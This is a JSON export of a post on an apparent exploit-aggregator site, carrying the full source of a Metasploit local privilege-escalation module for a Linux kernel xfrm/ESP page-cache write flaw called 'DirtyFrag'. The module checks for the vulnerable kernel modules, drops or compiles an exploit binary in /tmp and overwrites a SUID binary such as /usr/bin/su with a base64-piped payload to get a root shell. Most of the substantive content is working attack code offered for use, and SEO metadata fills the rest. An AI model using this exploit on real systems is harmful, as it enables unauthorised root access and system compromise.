{"id":56156,"date":"2026-05-21T14:35:13","date_gmt":"2026-05-21T14:35:13","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=56156"},"modified":"2026-05-21T14:35:13","modified_gmt":"2026-05-21T14:35:13","slug":"xfrm-esp-page-cache-write-via-cve-2026-43284","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=56156","title":{"rendered":"xfrm-ESP Page-Cache Write via CVE-2026-43284_MSF:EXPLOIT-LINUX-LOCAL-CVE_2026_43284_DIRTY_FRAG-"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-05-21T19:28:02&#8243;,&#8221;description&#8221;:&#8221;CVE-2026-43284 is a Linux kernel page-cache write vulnerability in the IPsec\/xfrm subsystem affecting ESP Encapsulating Security Payload fragmentation. Dubbed \\&#8221;DirtyFrag\\&#8221;, the bug allows a local unprivileged user to gain write access to read-only&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-05-21T19:01:04&#8243;,&#8221;modified&#8221;:&#8221;2026-05-21T19:01:04&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;xfrm-ESP Page-Cache Write via CVE-2026-43284&#8243;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:EXPLOIT-LINUX-LOCAL-CVE_2026_43284_DIRTY_FRAG-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2026-43284&#8243;],&#8221;sourceData&#8221;:&#8221;##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Local\\n  Rank = GoodRanking\\n\\n  include Msf::Post::File\\n  include Msf::Post::Linux::Priv\\n  include Msf::Post::Linux::Kernel\\n  include Msf::Post::Linux::System\\n  include Msf::Post::Linux::Compile\\n  include Msf::Exploit::EXE\\n  include Msf::Exploit::FileDropper\\n\\n  def initialize(info = {})\\n    super(\\n      update_info(\\n        info,\\n        &#8216;Name&#8217; =\\u003e &#8216;xfrm-ESP Page-Cache Write via CVE-2026-43284&#8217;,\\n        &#8216;Description&#8217; =\\u003e %q{\\n          CVE-2026-43284 is a Linux kernel page-cache write vulnerability in the IPsec\/xfrm\\n          subsystem affecting ESP (Encapsulating Security Payload) fragmentation. Dubbed\\n          \\&#8221;DirtyFrag\\&#8221;, the bug allows a local unprivileged user to gain write access to read-only\\n          page-cache pages by triggering a race condition in how the kernel handles shared fragments\\n          when processing ESP-encapsulated UDP packets. The exploit overwrites a SUID binary on disk\\n          to execute an arbitrary payload as root.\\n        },\\n        &#8216;License&#8217; =\\u003e MSF_LICENSE,\\n        &#8216;Author&#8217; =\\u003e [\\n          &#8216;Hyunwoo Kim&#8217;,      # Discovery\\n          &#8216;Giovanni Heward&#8217;,  # Original module\\n        ],\\n        &#8216;References&#8217; =\\u003e [\\n          [&#8216;CVE&#8217;, &#8216;2026-43284&#8217;],\\n          [&#8216;URL&#8217;, &#8216;https:\/\/github.com\/V4bel\/dirtyfrag&#8217;],\\n        ],\\n        &#8216;SessionTypes&#8217; =\\u003e [ &#8216;shell&#8217;, &#8216;meterpreter&#8217; ],\\n        &#8216;Platform&#8217; =\\u003e [ &#8216;linux&#8217;, &#8216;unix&#8217;],\\n        &#8216;Arch&#8217; =\\u003e ARCH_CMD,\\n        &#8216;Targets&#8217; =\\u003e [[ &#8216;Auto&#8217;, {} ]],\\n        &#8216;DisclosureDate&#8217; =\\u003e &#8216;2026-05-08&#8217;,\\n        &#8216;Notes&#8217; =\\u003e {\\n          &#8216;Reliability&#8217; =\\u003e [ REPEATABLE_SESSION ],\\n          &#8216;Stability&#8217; =\\u003e [ CRASH_OS_DOWN ],\\n          &#8216;SideEffects&#8217; =\\u003e [ ARTIFACTS_ON_DISK, CONFIG_CHANGES ]\\n        }\\n      )\\n    )\\n\\n    register_options([\\n      OptString.new(&#8216;WRITABLE_DIR&#8217;, [ true, &#8216;Directory to write files to&#8217;, &#8216;\/tmp&#8217; ]),\\n      OptString.new(&#8216;SUID_BINARY_PATH&#8217;, [ true, &#8216;The path to a suid binary&#8217;, &#8216;\/usr\/bin\/su&#8217; ])\\n    ])\\n  end\\n\\n  def check\\n    dirtyfrag_modprobe = cmd_exec(&#8216;ls \/etc\/modprobe.d\/ | grep -e dirty -e dirty-frag -e dirtyfrag&#8217;)\\n\\n    return CheckCode::Safe(&#8216;The machine seems to be patched&#8217;) unless dirtyfrag_modprobe.blank?\\n\\n    vuln_modules = %w[esp ipcomp]\\n    return CheckCode::Unknown(&#8216;The vulnerable modules have not been detected&#8217;) unless kernel_modules.any? { |m| vuln_modules.include?(m) }\\n\\n    kernel_version = Rex::Version.new kernel_release.split(&#8216;-&#8216;).first\\n\\n    return CheckCode::Safe(&#8216;The kernel version is older than the commit when bug was introduced&#8217;) if kernel_version \\u003c Rex::Version.new(&#8216;4.10&#8217;)\\n\\n    CheckCode::Appears(&#8216;The target is vulnerable, vulnerable module detected and no mitigation detected&#8217;)\\n  end\\n\\n  def exploit\\n    suid_binary_path = datastore[&#8216;SUID_BINARY_PATH&#8217;]\\n\\n    fail_with(Failure::BadConfig, \\&#8221;The #{suid_binary_path} does not exists on target system\\&#8221;) unless setuid?(suid_binary_path)\\n\\n    payload_dir = datastore[&#8216;WRITABLE_DIR&#8217;]\\n    fail_with(Failure::NoAccess, &#8216;Cannot write into WRITABLE_DIR, make sure you select writable directory&#8217;) unless writable?(payload_dir)\\n\\n    arch = kernel_arch\\n\\n    cmd_payload = framework.payloads.create(\\&#8221;linux\/#{arch}\/exec\\&#8221;)\\n    fail_with(Failure::NoTarget, \\&#8221;#{arch} targets are not supported.\\&#8221;) if cmd_payload.nil? || !cmd_payload.options.key?(&#8216;PrependSetuid&#8217;)\\n\\n    cmd_payload.datastore[&#8216;CMD&#8217;] = payload.encoded\\n    cmd_payload.datastore[&#8216;PrependSetuid&#8217;] = true\\n    elf = cmd_payload.generate_simple(&#8216;Format&#8217; =\\u003e &#8216;elf&#8217;)\\n\\n    # add padding\\n    elf += \\&#8221;\\\\xff\\&#8221; * ((4 &#8211; (elf.size % 4)) % 4)\\n\\n    exploit_file = \\&#8221;#{payload_dir}\/.#{Rex::Text.rand_text_alpha_lower(6..12)}\\&#8221;\\n\\n    if live_compile?\\n      vprint_status(&#8216;Live compiling exploit on system&#8230;&#8217;)\\n      exploit_c = exploit_data(&#8216;CVE-2026-43284&#8217;, &#8216;CVE_2026_43284.c&#8217;)\\n      upload_and_compile(exploit_file, exploit_c)\\n    else\\n\\n      fail_with(Failure::BadConfig, &#8216;Precompiled exploit only supported for x64, x86, Arm64 and Armel&#8217;) unless [ARCH_X64, ARCH_X86, ARCH_AARCH64, ARCH_ARMLE].include?(arch)\\n      vprint_status(&#8216;Dropping pre-compiled exploit on system&#8230;&#8217;)\\n\\n      exploit_bin = exploit_data(&#8216;CVE-2026-43284&#8217;, \\&#8221;CVE_2026_43284_#{arch}\\&#8221;)\\n      upload_and_chmodx(exploit_file, exploit_bin)\\n    end\\n\\n    register_file_for_cleanup(exploit_file)\\n\\n    print_status(%(Trying to run the exploit: \\&#8221;echo -n #{Base64.strict_encode64(elf)} | base64 -d | #{exploit_file} #{elf.size} #{suid_binary_path}\\&#8221;))\\n    # patch the setuid file\\n    response = cmd_exec(\\&#8221;echo -n #{Base64.strict_encode64(elf)} | base64 -d | #{exploit_file} #{elf.size} #{suid_binary_path}\\&#8221;)\\n\\n    fail_with(Failure::NotVulnerable, &#8216;The target machine does not seem to be vulnerable&#8217;) unless response.include?(&#8216;payload delivered&#8217;)\\n\\n    print_status(&#8216;Running the payload&#8217;)\\n    # run the payload\\n    cmd_exec(suid_binary_path.to_s)\\n  end\\n\\n  def on_new_session(session)\\n    print_status(&#8216;Restoring balance in galaxy&#8217;)\\n    if session.type.eql?(&#8216;meterpreter&#8217;)\\n      session.core.use(&#8216;stdapi&#8217;) unless session.ext.aliases.include?(&#8216;stdapi&#8217;)\\n      session.sys.process.execute(&#8216;\/bin\/sh&#8217;, \\&#8221;-c &#8216;echo 3 \\u003e \/proc\/sys\/vm\/drop_caches\\&#8221;)\\n    else\\n      session.shell_command_token(&#8216;echo 3 \\u003e \/proc\/sys\/vm\/drop_caches&#8217;)\\n    end\\n\\n    super\\n  end\\n\\nend\\n&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/linux\/local\/cve_2026_43284_dirty_frag.rb&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:8.8,&#8221;severity&#8221;:&#8221;HIGH&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:L\/AC:L\/PR:L\/UI:N\/S:C\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.rapid7.com\/db\/modules\/exploit\/linux\/local\/cve_2026_43284_dirty_frag\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-05-21T19:28:02&#8243;,&#8221;description&#8221;:&#8221;CVE-2026-43284 is a Linux kernel page-cache write vulnerability in the IPsec\/xfrm subsystem affecting ESP Encapsulating Security Payload fragmentation. Dubbed \\&#8221;DirtyFrag\\&#8221;, the bug allows a local&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,41,12,15,169,13,7,11,5],"class_list":["post-56156","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-88","tag-exploit","tag-high","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>xfrm-ESP Page-Cache Write via CVE-2026-43284_MSF:EXPLOIT-LINUX-LOCAL-CVE_2026_43284_DIRTY_FRAG- zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=56156\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"xfrm-ESP Page-Cache Write via CVE-2026-43284_MSF:EXPLOIT-LINUX-LOCAL-CVE_2026_43284_DIRTY_FRAG- zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-05-21T19:28:02&#8243;,&#8221;description&#8221;:&#8221;CVE-2026-43284 is a Linux kernel page-cache write vulnerability in the IPsec\/xfrm subsystem affecting ESP Encapsulating Security Payload fragmentation. Dubbed &#8221;DirtyFrag&#8221;, the bug allows a local...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=56156\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-05-21T14:35:13+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=56156#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=56156\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"xfrm-ESP Page-Cache Write via CVE-2026-43284_MSF:EXPLOIT-LINUX-LOCAL-CVE_2026_43284_DIRTY_FRAG-\",\"datePublished\":\"2026-05-21T14:35:13+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=56156\"},\"wordCount\":994,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-8.8\",\"exploit\",\"HIGH\",\"metasploit\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=56156#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=56156\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=56156\",\"name\":\"xfrm-ESP Page-Cache Write via CVE-2026-43284_MSF:EXPLOIT-LINUX-LOCAL-CVE_2026_43284_DIRTY_FRAG- zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-05-21T14:35:13+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=56156#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=56156\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=56156#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"xfrm-ESP Page-Cache Write via CVE-2026-43284_MSF:EXPLOIT-LINUX-LOCAL-CVE_2026_43284_DIRTY_FRAG-\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"xfrm-ESP Page-Cache Write via CVE-2026-43284_MSF:EXPLOIT-LINUX-LOCAL-CVE_2026_43284_DIRTY_FRAG- zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=56156","og_locale":"en_US","og_type":"article","og_title":"xfrm-ESP Page-Cache Write via CVE-2026-43284_MSF:EXPLOIT-LINUX-LOCAL-CVE_2026_43284_DIRTY_FRAG- zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-05-21T19:28:02&#8243;,&#8221;description&#8221;:&#8221;CVE-2026-43284 is a Linux kernel page-cache write vulnerability in the IPsec\/xfrm subsystem affecting ESP Encapsulating Security Payload fragmentation. Dubbed &#8221;DirtyFrag&#8221;, the bug allows a local...","og_url":"https:\/\/zero.redgem.net\/?p=56156","og_site_name":"zero redgem","article_published_time":"2026-05-21T14:35:13+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=56156#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=56156"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"xfrm-ESP Page-Cache Write via CVE-2026-43284_MSF:EXPLOIT-LINUX-LOCAL-CVE_2026_43284_DIRTY_FRAG-","datePublished":"2026-05-21T14:35:13+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=56156"},"wordCount":994,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-8.8","exploit","HIGH","metasploit","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=56156#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=56156","url":"https:\/\/zero.redgem.net\/?p=56156","name":"xfrm-ESP Page-Cache Write via CVE-2026-43284_MSF:EXPLOIT-LINUX-LOCAL-CVE_2026_43284_DIRTY_FRAG- zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-05-21T14:35:13+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=56156#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=56156"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=56156#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"xfrm-ESP Page-Cache Write via CVE-2026-43284_MSF:EXPLOIT-LINUX-LOCAL-CVE_2026_43284_DIRTY_FRAG-"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/56156","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=56156"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/56156\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=56156"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=56156"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=56156"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}